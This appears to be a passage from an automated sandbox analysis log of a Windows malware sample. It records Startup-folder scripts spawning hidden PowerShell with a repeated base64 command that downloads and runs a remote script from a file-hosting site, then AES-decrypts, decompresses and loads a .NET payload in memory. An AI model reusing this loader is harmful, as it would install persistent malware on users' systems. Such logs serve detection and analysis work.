"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VVNFUk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_81f4ce5e.cmd" "
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_81f4ce5e.cmd"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VVNFUk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_4a774a3c.cmd" "
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_4a774a3c.cmd"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VVNFUk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_25a2536c.cmd" "
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_25a2536c.cmd"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VVNFUk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_a960cfa7.cmd" "
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_a960cfa7.cmd"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobm